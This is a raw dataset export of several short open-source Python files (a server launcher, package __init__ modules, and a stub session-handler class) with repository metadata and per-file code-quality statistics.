Herikc2/IoT-Previsao-de-Uso-de-Energia
|
a480ad92d83480b3e0b445355e79307ce01deb1d
|
[
"MIT"
] | null | null | null |
api/main.py
|
Herikc2/IoT-Previsao-de-Uso-de-Energia
|
a480ad92d83480b3e0b445355e79307ce01deb1d
|
[
"MIT"
] | null | null | null |
# Importar bibliotecas
from src.server.instance import server
from src.controllers.previsao import *
server.run()
| 19.166667
| 38
| 0.808696
| 15
| 115
| 6.2
| 0.666667
| 0.150538
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.113043
| 115
| 6
| 39
| 19.166667
| 0.911765
| 0.173913
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.666667
| 0
| 0.666667
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 5
|
7097bd8c13f5d06752e5cc1366c59ceb71f51f8b
| 56
|
py
|
Python
|
depth/models/utils/hooks/__init__.py
|
zhyever/Monocular-Depth-Estimation-Toolbox
|
c591b9711321450387ffa7322ec1db9a340347c2
|
[
"Apache-2.0"
] | 21
|
2022-03-12T01:42:05.000Z
|
2022-03-31T17:01:45.000Z
|
depth/models/utils/hooks/__init__.py
|
zhyever/Monocular-Depth-Estimation-Toolbox
|
c591b9711321450387ffa7322ec1db9a340347c2
|
[
"Apache-2.0"
] | 2
|
2022-03-29T10:50:33.000Z
|
2022-03-30T10:40:53.000Z
|
depth/models/utils/hooks/__init__.py
|
zhyever/Monocular-Depth-Estimation-Toolbox
|
c591b9711321450387ffa7322ec1db9a340347c2
|
[
"Apache-2.0"
] | 3
|
2022-03-26T11:52:44.000Z
|
2022-03-30T21:24:16.000Z
|
from .tensorboard_hook import TensorboardImageLoggerHook
| 56
| 56
| 0.928571
| 5
| 56
| 10.2
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.053571
| 56
| 1
| 56
| 56
| 0.962264
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 5
|
709f50e204ec8910cedb0d2de6a8babf99f30e00
| 212
|
py
|
Python
|
saturn_client/__init__.py
|
saturncloud/saturn-client
|
8d2f8ef41f9ef5be9c452fbfc8fcec5fa515a869
|
[
"BSD-3-Clause"
] | null | null | null |
saturn_client/__init__.py
|
saturncloud/saturn-client
|
8d2f8ef41f9ef5be9c452fbfc8fcec5fa515a869
|
[
"BSD-3-Clause"
] | 3
|
2020-12-21T22:28:13.000Z
|
2021-09-15T16:06:07.000Z
|
saturn_client/__init__.py
|
saturncloud/saturn-client
|
8d2f8ef41f9ef5be9c452fbfc8fcec5fa515a869
|
[
"BSD-3-Clause"
] | 1
|
2021-09-15T02:07:23.000Z
|
2021-09-15T02:07:23.000Z
|
"""
imports added so users do not have to think about submodules
"""
from .core import SaturnConnection # noqa: F401
from ._version import get_versions
__version__ = get_versions()["version"]
del get_versions
| 21.2
| 60
| 0.768868
| 29
| 212
| 5.344828
| 0.724138
| 0.212903
| 0.232258
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.016667
| 0.150943
| 212
| 9
| 61
| 23.555556
| 0.844444
| 0.339623
| 0
| 0
| 0
| 0
| 0.05303
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.5
| 0
| 0.5
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
|
0
| 5
|
70a64ec42beab0d52fac539cfe8ef4951a201fb5
| 147
|
py
|
Python
|
pylammpsmpi/__init__.py
|
srmnitc/pylammpsmpi
|
5d459ce67838731aabd59071430e20f04ad57c5f
|
[
"BSD-3-Clause"
] | 11
|
2020-06-20T15:50:35.000Z
|
2021-12-19T16:37:57.000Z
|
pylammpsmpi/__init__.py
|
jan-janssen/pylammpsmpi
|
4a1326ace148b114754e09b28059a9b778bf47ee
|
[
"BSD-3-Clause"
] | 31
|
2020-03-05T18:58:09.000Z
|
2022-03-07T08:52:30.000Z
|
pylammpsmpi/__init__.py
|
jan-janssen/pylammpsmpi
|
4a1326ace148b114754e09b28059a9b778bf47ee
|
[
"BSD-3-Clause"
] | 4
|
2020-03-05T18:19:30.000Z
|
2021-06-04T04:43:23.000Z
|
from pylammpsmpi.lammps_wrapper import LammpsLibrary
from ._version import get_versions
__version__ = get_versions()["version"]
del get_versions
| 21
| 52
| 0.836735
| 18
| 147
| 6.333333
| 0.555556
| 0.289474
| 0.315789
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.102041
| 147
| 6
| 53
| 24.5
| 0.863636
| 0
| 0
| 0
| 0
| 0
| 0.047619
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.5
| 0
| 0.5
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
|
0
| 5
|
560e1c9ba4a281bfa549f9ad17b94add2c9ff035
| 73
|
py
|
Python
|
orka_vector_api/views/__init__.py
|
jansule/OrKa-Vector-API
|
3daa4033550d0f9c63ae38cadc982e30f0f04651
|
[
"Apache-2.0"
] | 1
|
2021-07-16T11:56:49.000Z
|
2021-07-16T11:56:49.000Z
|
orka_vector_api/views/__init__.py
|
jansule/OrKa-Vector-API
|
3daa4033550d0f9c63ae38cadc982e30f0f04651
|
[
"Apache-2.0"
] | 1
|
2021-05-21T07:29:11.000Z
|
2021-05-21T07:29:11.000Z
|
orka_vector_api/views/__init__.py
|
jansule/OrKa-Vector-API
|
3daa4033550d0f9c63ae38cadc982e30f0f04651
|
[
"Apache-2.0"
] | 1
|
2021-04-12T09:06:26.000Z
|
2021-04-12T09:06:26.000Z
|
from .data import data
from .jobs import jobs
from .status import status
| 18.25
| 26
| 0.794521
| 12
| 73
| 4.833333
| 0.416667
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.164384
| 73
| 3
| 27
| 24.333333
| 0.95082
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 5
|
564dfb9d32316bcf5b055e004a0bb77b61750a17
| 62
|
py
|
Python
|
nupy/__init__.py
|
begeistert/nupy
|
b1026afc21b9a985a3329f1a16006aec8fa4d726
|
[
"MIT"
] | null | null | null |
nupy/__init__.py
|
begeistert/nupy
|
b1026afc21b9a985a3329f1a16006aec8fa4d726
|
[
"MIT"
] | null | null | null |
nupy/__init__.py
|
begeistert/nupy
|
b1026afc21b9a985a3329f1a16006aec8fa4d726
|
[
"MIT"
] | null | null | null |
from .sympy_algebra import *
from .iterative_methods import *
| 20.666667
| 32
| 0.806452
| 8
| 62
| 6
| 0.75
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.129032
| 62
| 2
| 33
| 31
| 0.888889
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 5
|
5666e40a48cfbffa3c0683f6adb0a389a52ba508
| 368
|
py
|
Python
|
datagateway_api/src/search_api/session_handler.py
|
MRichards99/datagateway-api
|
2e6133636fed950a16190d2f703f152c73bb5b1b
|
[
"Apache-2.0"
] | null | null | null |
datagateway_api/src/search_api/session_handler.py
|
MRichards99/datagateway-api
|
2e6133636fed950a16190d2f703f152c73bb5b1b
|
[
"Apache-2.0"
] | null | null | null |
datagateway_api/src/search_api/session_handler.py
|
MRichards99/datagateway-api
|
2e6133636fed950a16190d2f703f152c73bb5b1b
|
[
"Apache-2.0"
] | null | null | null |
# TODO - can we enforce a singleton pattern on the class?
class SessionHandler:
def __init__(self):
self.client = None
self.session_id = None
def requires_session_id(method):
"""
TODO
"""
pass
"""
@wraps(method)
def wrapper_requires_session(*args, **kwargs):
pass
return wrapper_requires_session
"""
| 17.52381
| 57
| 0.616848
| 42
| 368
| 5.142857
| 0.619048
| 0.208333
| 0.203704
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.285326
| 368
| 20
| 58
| 18.4
| 0.821293
| 0.165761
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.1
| 0
| 1
| 0.333333
| false
| 0.166667
| 0
| 0
| 0.5
| 0
| 0
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 5
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.